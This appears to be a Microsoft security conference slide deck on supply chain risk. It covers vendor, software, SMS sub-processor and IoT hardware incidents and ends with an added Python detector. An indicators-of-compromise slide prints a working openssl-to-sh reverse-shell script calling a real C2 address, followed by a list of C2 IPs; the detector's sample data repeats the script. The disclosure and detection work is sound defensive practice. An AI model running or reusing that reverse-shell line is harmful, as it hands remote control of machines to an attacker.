###### The Enemy Within: Modern Supply Chain Attacks
Eric Doerr, GM Microsoft Security Response Center (MSRC), @edoerr
-----
###### We all know the world rests on a giant turtle…
-----
###### way down…
-----
#### I'm in your supply chain, and you're in mine. We're in this together.
-----
###### Am I in your supply chain?
##### Are you in mine?
• Linux is the most popular OS on Azure
• >35k unique OSS projects
• >10K 3rd party tools
• Surface, HoloLens, Xbox hardware suppliers
• Server infrastructure in the Microsoft cloud
-----
###### Media is overly focused on hardware
Supply chain > hardware
-----
###### I'm not talking about… [image] OR [image]. And definitely not [image].
-----
### Evaluating supply chain risk
-----
###### How we think about Supply Chain Risk
Hardware, Software, Services, People
-----
## How do we defend Microsoft?
###### Commonalities & differences
-----
Microsoft at scale (metrics slide; labels and the three surviving figures):
• Number of employees
• Number of countries with Microsoft offices
• Authentication requests per month hitting the network: 630B
• Managed devices
• On-premises workload reduction
• Microsoft Teams meetings/month
• Transactions on the sales platform per day: 842K
• Data Centers worldwide: 100+
• Cloud based services
-----
###### Microsoft Cloud: 140 Countries, 54 Regions
-----
#### Microsoft is a complex company to defend… how do we do it?
-----
• Centralized hubs for cybersecurity and defense, uniting personnel from each defender team
• Shared technology, analytics, playbooks
• Shared locations and, more importantly, a commitment to "defend together"
• 24 x 7 x 365 protection of the Microsoft platform and customers
-----
###### People
### Let's talk about people
-----
###### There are people in your supply chain
-----
###### Gift Card abuse
Kill chain: **Credential compromise** → **Backdoor** → **Lateral movement** → **C&C**; entry point: Microsoft vendors **(People)**
1. **3rd party reporting**: During an unknown time period, a financially motivated threat actor allegedly compromises the Wipro network and gains access to multiple companies through trusted vendor relationships.
2. **Apr 2019**: CDOC teams mobilized based on reports of potential compromise to determine the risk exposure to Microsoft and Microsoft customers.
3. **Apr 2019**: After a thorough investigation, no malicious activity observed within Microsoft.
**Potential Impact** and **Response**
• Risk assessment and vendor inventory audit performed
• Block newly identified malicious domains
• Precautionary reset of credentials for vendor accounts
• Additional monitoring of systems belonging to vendor employees
• Windows Defender signature deployed to detect the adversary's specific Mimikatz binary
-----
###### Practical Advice: Securing people in your supply chain
• Always "assume breach"
• Strict inventory of vendor & partner access
• Automated policy governance where possible
• Follow the principle of least privilege
• Provide devices and/or virtual monitoring
• Any privileged access needs tighter controls (MFA etc.) and detection systems in place
-----
###### Software
### Let's talk about software
-----
###### There is software in your supply chain
-----
**April 2018**: Reports that Team Viewer software and/or infrastructure is leveraged by a threat actor.
Labels: **BACKDOOR**, **SUPPLY CHAIN ATTACK**, **OEM**, **MALICIOUS CODE**, **3rd Party Service**, **Physical Machine**
2. OEMs use the service for provisioning and troubleshooting of physical machines. 3rd Party Service: the service is connected to internal resources for deployment of new hardware.
4. Threat actor could leverage the service to install firmware or BIOS implants on physical machines during OEM deployment.
**May 2018**: AppLocker and firewall blocking initiated against service files and connections. Machines are re-imaged prior to delivery or deployment.
**Potential Actions on Objective** (physical machine): theoretically an implant could remain after provisioning:
- **Steal data**
- **Disrupt or deny access**
- **Distribute and Manage Malware**
**Response**
• Performed audit of software usage to assess risk if the software was compromised
• Updated policy to block remote access software
• Notifications sent to impacted employees
• AppLocker and firewall blocks put in place
• Updated contracts with suppliers
-----
###### Practical Advice: Securing Software in your supply chain
Lifecycle stages: Pre-Selection, Selection, Contract, Onboard, Monitor, Terminate
**Pre-Selection**: Shortlist software solutions and suppliers with strong security credentials. Kick off security engagements during the RFP and shortlisting phase.
**Selection** (_Risk Profiling & Assessment Services_): Enable the selection of software solutions and suppliers which adhere to defined Microsoft Security requirements.
**Contract** (_Standard Contract Language Review & Contract Negotiation Consulting_): Apply enforceable terms to contracts in relation to Microsoft Security and Privacy requirements. Perform security assurance prior to contract negotiations to enable customers/business groups to make a risk-based decision.
**Onboard** (_Remediation_): Ensure customers/business groups are aware of any ongoing expectations related to their chosen software solutions and suppliers. Ensure suppliers are committed to the requirements set forth for their software solutions and organization, and to their responsibility to remediate any known or open issues.
**Monitor** (_Risk Profiling_, _Continuous Monitoring_): Perform monitoring and periodic re-assessments based on the status of changes to the risk profiles. Perform periodic review of software solution usage and contract information to identify solutions which are inactive or expected to be decommissioned.
**Terminate** (_Termination Support_): Implement necessary safeguards for solutions being decommissioned and provide termination and support. Investigate changes in risk assessment and move to termination if they cannot be quickly addressed.
-----
###### Services
### Let's talk about services
-----
#### Do you inventory every service you use?
-----
###### Upstream vs. Downstream
**Upstream**
• DNS
• PKI
• Cloud service providers
• VPN service providers
• ISPs
• Any business partner you rely on to provide you services
**Downstream**
• Financial outsourcing
• Content delivery networks
• Distribution services (e.g. Github, Dropbox, etc.)
• Push networks
• Any business partner that helps you provide services to your …
-----
Labels: **MULTI-FACTOR AUTHENTICATION**, **SCANNING**, **Sub-processors** (Telco Provider: **Phone Number**, **Access Code**), **ERROR, NEGLECT**, **LEAK/EXFILTRATE DATA**, **ACTIONS ON THE OBJECTIVE**
1. … highlighting security research reporting an exposed database associated with an SMS sub-processor.
2. The data exposed encompassed SMS messages containing phone numbers and short-term access codes.
**Response**
• Inspected exposed data to evaluate risk
• Expired all valid one-time tokens immediately to contain risk
• Work began to investigate the scope and impact of the potential disclosure
• Investigated potential attempted or successful logins
• No misuse of the two-factor codes was identified
-----
###### Hardware
### Ok, let's talk about hardware
-----
Kill chain labels: **Security control evasion**, **Credential compromise**, **Backdoor**, **C&C**, **Reconnaissance**, **ACTIONS ON THE OBJECTIVE**
**Apr 2019**: The Microsoft Threat Intelligence Center (MSTIC) discovered suspicious activity from infrastructure previously associated with STRONTIUM targeting several 3rd party customers.
Internet-facing video decoder device with default credentials used to establish a link into targeted networks.
VPN … credentials used to establish … into targeted …
4. Compromised account logged in to IP addresses associated with IoT devices (telephony) from external VPNs.
5. Incident responders reset passwords, pull the hard disk of the printer, and block known domains.
**Response**
• Mobilized CDOC responders to investigate and partner with 3rd party customer security teams
• IoT devices were quarantined and sent for forensic analysis
• Impacted service account credentials were changed
• Malicious domains and IPs were blocked on affected networks
• Proactively shared adversary TTPs with IoT vendors
-----
###### Indicators of Compromise (1/2)
Contents of the [IOT Device] file:
```sh
#!/bin/sh
export [IOT Device]="-qws -display :1 -nomouse"
echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f 'openssl'); fi);done)&' &
```
-----
###### Indicators of Compromise (2/2)
The following IP addresses are believed to have been used by the actor for command and control (C2):
167.114.153.55
94.237.37.28
82.118.242.171
31.220.61.251
128.199.199.187
More details on our blog: https://msrc-blog.microsoft.com/2019/08/05/corporate
-----
### 4 Takeaways
-----
# 1
## Share More
#### Let's make the adversaries work harder by working together.
-----
###### How can we share more?
We need to change our cultural approach:
• Media: "name and shame" → "learn and defend together"
• Customer: "why was there an issue" → "how did they respond?"
• Business: "containment & opacity" → "partnership & transparency"
• Disclosure: "code defects" → "tactics that work"
-----
# 2
## Response matters
#### We should focus more on how companies respond to security events, not whether they happen.
-----
###### Remember, we're all in this together
Best Practices:
• Proactively inform customers of impact
• Engage transparently and without defensiveness
• Respond to reasonable requests for validation
• Learn from mistakes
-----
# 3
## Sweat the small stuff
#### Adversaries will find the path of least resistance.
-----
# 4
## Embrace the whole
#### People + Software + Services + Hardware = Supply Chain
-----
### Thanks!
-----
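###### Added example: turning the IoC slides into a detection
The script on the "Indicators of Compromise (1/2)" slide wraps `openssl s_client` in an `until` reconnect loop and pipes the TLS connection into `sh`. The detector below is an added example, not part of this deck or of Microsoft's tooling: it scans constructed `ps -eo args`-style command lines for that shape and checks the endpoint against the C2 list from the (2/2) slide.

```python
import re

# C2 addresses listed on the "Indicators of Compromise (2/2)" slide
KNOWN_C2 = {"167.114.153.55", "94.237.37.28", "82.118.242.171",
            "31.220.61.251", "128.199.199.187"}

# "openssl s_client ... -host <addr> -port <n>", the form used in the IoC script
S_CLIENT_RE = re.compile(r"openssl\s+s_client\b[^|;&]*?-host\s+(\S+)\s+-port\s+(\d+)")
# a pipeline stage that is a bare shell, optionally wrapped in "while ...; do sh"
PIPE_TO_SH_RE = re.compile(r"\|\s*(?:while\b[^|]*?\b)?sh\b")
# "until (" wrapper: the reconnect loop that keeps the implant calling home
RETRY_LOOP_RE = re.compile(r"\buntil\s*\(")


def analyze_command(cmdline):
    """Classify one process command line or script body.
    verdict: "benign" (no s_client-into-shell pattern), "reverse-shell"
    (pattern present, endpoint unknown) or "reverse-shell-known-c2".
    """
    endpoints = [(h, int(p)) for h, p in S_CLIENT_RE.findall(cmdline)]
    piped_to_shell = PIPE_TO_SH_RE.search(cmdline) is not None
    retry_loop = RETRY_LOOP_RE.search(cmdline) is not None
    if not endpoints or not piped_to_shell:
        verdict = "benign"
    elif any(host in KNOWN_C2 for host, _ in endpoints):
        verdict = "reverse-shell-known-c2"
    else:
        verdict = "reverse-shell"
    return {"endpoints": endpoints, "retry_loop": retry_loop, "verdict": verdict}


def scan_process_list(lines):
    """Run analyze_command over ps-style lines and return only the hits."""
    results = [(line, analyze_command(line)) for line in lines]
    return [r for r in results if r[1]["verdict"] != "benign"]


# Constructed sample of process command lines: the first is an abridged copy of
# the script on the IoC slide, the others are ordinary benign uses.
SAMPLE_PS = [
    "sh -c '(until (sh -c \"openssl s_client -quiet -host 167.114.153.55 -port 443 "
    "|while : ; do sh && break; done| openssl s_client -quiet -host 167.114.153.55 "
    "-port 443\"); do sleep 10; done)&'",
    "openssl s_client -connect example.com:443 -showcerts",
    "sh -c 'cat /etc/motd | tee /tmp/banner'",
]

if __name__ == "__main__":
    for cmd, res in scan_process_list(SAMPLE_PS):
        print(res["verdict"], res["endpoints"], cmd[:60])
```

A hit on an unknown endpoint is still worth a ticket; the reconnect loop and the s_client-into-shell shape are the durable signal, the IP list is only what was known when the slide was written.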